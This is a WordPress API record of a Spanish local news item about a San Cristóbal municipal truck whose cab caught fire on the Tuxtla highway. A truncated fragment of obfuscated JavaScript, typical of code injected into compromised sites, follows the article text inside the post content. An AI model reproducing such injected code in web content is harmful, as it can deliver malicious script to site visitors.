{"id":14733,"date":"2024-03-19T04:10:58","date_gmt":"2024-03-19T04:10:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14733"},"modified":"2024-03-19T04:11:00","modified_gmt":"2024-03-19T04:11:00","slug":"se-quema-camioneta-del-ayuntamiento-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14733","title":{"rendered":"Se quema Camioneta del ayuntamiento de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240318-WA0004-1024x768.jpg\" alt=\"\" class=\"wp-image-14734\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240318-WA0004-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240318-WA0004-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240318-WA0004-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240318-WA0004.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>18 de Marzo del 2024. San Crist\u00f3bal de Las Casas.- Una Camioneta que se supo es propiedad del ayuntamiento de San Crist\u00f3bal, termin\u00f3 quemada su cabina, al parecer por una falla en el sistema el\u00e9ctrico, ante la falta de mantenimiento.<br>El hecho se dio sobre la carretera que conduce de San Crist\u00f3bal a Tuxtla Guti\u00e9rrez, cerca del kil\u00f3metro 46, donde afortunadamente el ch\u00f3fer logr\u00f3 salir de la unidad.<br>Al lugar acudieron Elementos del Cuerpo de Bomberos quienes sofocaron las llamas, y por algunos minutos se vio interrumpida la v\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal18 de Marzo del 2024. San Crist\u00f3bal de Las Casas.- Una Camioneta que se supo es propiedad del ayuntamiento de San Crist\u00f3bal, termin\u00f3 quemada su cabina, al parecer por una falla en el sistema el\u00e9ctrico, ante la falta de mantenimiento.El hecho se dio sobre la carretera que conduce de San Crist\u00f3bal a Tuxtla &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14734,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14733","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14733"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14733\/revisions"}],"predecessor-version":[{"id":14735,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14733\/revisions\/14735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14734"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}